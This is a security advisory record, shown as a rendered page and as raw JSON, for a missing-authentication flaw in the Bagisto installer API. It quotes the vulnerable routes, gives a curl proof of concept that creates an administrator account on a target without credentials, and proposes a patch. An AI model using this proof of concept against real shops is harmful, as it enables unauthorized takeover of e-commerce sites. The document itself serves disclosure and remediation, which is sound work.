ghsa-6h7w-v2xr-mqvw
Vulnerability from github
Published
2026-01-02 21:14
Modified
2026-01-03 00:32
Severity ?
8.8 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P
Summary
Bagisto Missing Authentication on Installer API Endpoints
Details

Vulnerable Code

File: packages/Ibkul/Installer/src/Routes/Ib.php

```

group(function () { Route::controller(InstallerController::class)-\>group(function () { Route::get('install', 'index')-\>name('installer.index'); Route::middleware(StartSession::class)-\>prefix('install/api')-\>group(function () { Route::post('env-file-setup', 'envFileSetup')-\>name('installer.env\_file\_setup'); Route::post('run-migration', 'runMigration')-\>name('installer.run\_migration')-\>withoutMiddleware('Ib'); Route::post('run-seeder', 'runSeeder')-\>name('installer.run\_seeder')-\>withoutMiddleware('Ib'); Route::get('download-sample', 'downloadSample')-\>name('installer.download\_sample')-\>withoutMiddleware('Ib'); Route::post('admin-config-setup', 'adminConfigSetup')-\>name('installer.admin\_config\_setup')-\>withoutMiddleware('Ib'); Route::post('sample-products-setup', 'createSampleProducts')-\>name('installer.sample\_products\_setup')-\>withoutMiddleware('Ib'); }); }); }); ``` API routes remain active even after initial installation is complete, allowing any unauthenticated attacker to: - Create admin accounts - Modify application configuration - Potentially overwrite existing data the underlying **API endpoints** (`/install/api/*`) are directly accessible and exploitable without any authentication. An attacker can bypass the Ib installer entirely by calling the API endpoints directly. ### How to Reproduce 1. The Ib installer UI at `http://localhost:8000/install` has client-side protections 2. **However, the API endpoints are directly exploitable:** - The attack works by calling `/install/api/admin-config-setup` directly via curl/HTTP client - No CSRF token, session, or authentication is required - The Ib UI workflow is completely bypassed ### Proof of Concept ``` #!/bin/bash # PoC: Create admin account without authentication TARGET="http://localhost:8000" # Create a new admin account curl -X POST "$TARGET/install/api/admin-config-setup" \ -H "Content-Type: application/json" \ -d '{ "admin_name": "Attacker", "admin_email": "attacker@evil.com", "admin_password": "HackedPassword123" }' echo "" echo "New admin account created!" echo "Login at: $TARGET/admin" echo "Email: attacker@evil.com" ``` ### Expected Result The API should reject unauthenticated requests with 401/403 status. ### Actual Result The API accepts the request and creates a new admin account, allowing full administrative access to the e-commerce platform. ### Recommended Patch Add installation completion check ``` // In InstallerController.php or a new middleware public function __construct() { // Check if application is already installed if (file_exists(base_path('.env')) && config('app.key') && \Schema::hasTable('admins') && \DB::table('admins')->count() > 0) { abort(404, 'Application already installed'); } } ``` ?>
Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "bagisto/bagisto"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.3.0"
            },
            {
              "fixed": "2.3.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-21446"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-02T21:14:06Z",
    "nvd_published_at": "2026-01-02T20:16:18Z",
    "severity": "HIGH"
  },
  "details": "### Vulnerable Code\n\n**File:** `packages/Ibkul/Installer/src/Routes/Ib.php`\n\n```\n\u003c?php\n\nuse Illuminate\\\\Session\\\\Middleware\\\\StartSession;  \nuse Illuminate\\\\Support\\\\Facades\\\\Route;  \nuse Ibkul\\\\Installer\\\\Http\\\\Controllers\\\\InstallerController;\n\nRoute::middleware(\\[\u0027Ib\u0027, \u0027installer\\_locale\u0027\\])-\\\u003egroup(function () {  \n    Route::controller(InstallerController::class)-\\\u003egroup(function () {  \n        Route::get(\u0027install\u0027, \u0027index\u0027)-\\\u003ename(\u0027installer.index\u0027);\n\n        Route::middleware(StartSession::class)-\\\u003eprefix(\u0027install/api\u0027)-\\\u003egroup(function () {  \n            Route::post(\u0027env-file-setup\u0027, \u0027envFileSetup\u0027)-\\\u003ename(\u0027installer.env\\_file\\_setup\u0027);  \n            Route::post(\u0027run-migration\u0027, \u0027runMigration\u0027)-\\\u003ename(\u0027installer.run\\_migration\u0027)-\\\u003ewithoutMiddleware(\u0027Ib\u0027);  \n            Route::post(\u0027run-seeder\u0027, \u0027runSeeder\u0027)-\\\u003ename(\u0027installer.run\\_seeder\u0027)-\\\u003ewithoutMiddleware(\u0027Ib\u0027);  \n            Route::get(\u0027download-sample\u0027, \u0027downloadSample\u0027)-\\\u003ename(\u0027installer.download\\_sample\u0027)-\\\u003ewithoutMiddleware(\u0027Ib\u0027);  \n            Route::post(\u0027admin-config-setup\u0027, \u0027adminConfigSetup\u0027)-\\\u003ename(\u0027installer.admin\\_config\\_setup\u0027)-\\\u003ewithoutMiddleware(\u0027Ib\u0027);  \n            Route::post(\u0027sample-products-setup\u0027, \u0027createSampleProducts\u0027)-\\\u003ename(\u0027installer.sample\\_products\\_setup\u0027)-\\\u003ewithoutMiddleware(\u0027Ib\u0027);  \n        });  \n    });  \n});\n```\n\nAPI routes remain active even after initial installation is complete, allowing any unauthenticated attacker to:\n\n- Create admin accounts  \n- Modify application configuration  \n- Potentially overwrite existing data\n\nthe underlying **API endpoints** (`/install/api/*`) are directly accessible and exploitable without any authentication. An attacker can bypass the Ib installer entirely by calling the API endpoints directly.\n\n### How to Reproduce\n\n1. The Ib installer UI at `http://localhost:8000/install` has client-side protections  \n2. **However, the API endpoints are directly exploitable:**  \n   - The attack works by calling `/install/api/admin-config-setup` directly via curl/HTTP client  \n   - No CSRF token, session, or authentication is required  \n   - The Ib UI workflow is completely bypassed\n\n### Proof of Concept\n\n```\n#!/bin/bash\n# PoC: Create admin account without authentication\n\n\nTARGET=\"http://localhost:8000\"\n\n\n# Create a new admin account\ncurl -X POST \"$TARGET/install/api/admin-config-setup\" \\\n    -H \"Content-Type: application/json\" \\\n    -d \u0027{\n        \"admin_name\": \"Attacker\",\n        \"admin_email\": \"attacker@evil.com\",\n        \"admin_password\": \"HackedPassword123\"\n    }\u0027\n\n\necho \"\"\necho \"New admin account created!\"\necho \"Login at: $TARGET/admin\"\necho \"Email: attacker@evil.com\"\n```\n\n### Expected Result\n\nThe API should reject unauthenticated requests with 401/403 status.\n\n### Actual Result\n\nThe API accepts the request and creates a new admin account, allowing full administrative access to the e-commerce platform.\n\n### Recommended Patch\n\nAdd installation completion check\n\n```\n// In InstallerController.php or a new middleware\n\n\npublic function __construct()\n{\n    // Check if application is already installed\n    if (file_exists(base_path(\u0027.env\u0027)) \u0026\u0026\n        config(\u0027app.key\u0027) \u0026\u0026\n        \\Schema::hasTable(\u0027admins\u0027) \u0026\u0026\n        \\DB::table(\u0027admins\u0027)-\u003ecount() \u003e 0) {\n        abort(404, \u0027Application already installed\u0027);\n    }\n}\n```",
  "id": "GHSA-6h7w-v2xr-mqvw",
  "modified": "2026-01-03T00:32:30Z",
  "published": "2026-01-02T21:14:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/bagisto/bagisto/security/advisories/GHSA-6h7w-v2xr-mqvw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21446"
    },
    {
      "type": "WEB",
      "url": "https://github.com/bagisto/bagisto/commit/380c045e48490da740cd505fb192cc45e1809bed"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/bagisto/bagisto"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Bagisto Missing Authentication on Installer API Endpoints"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.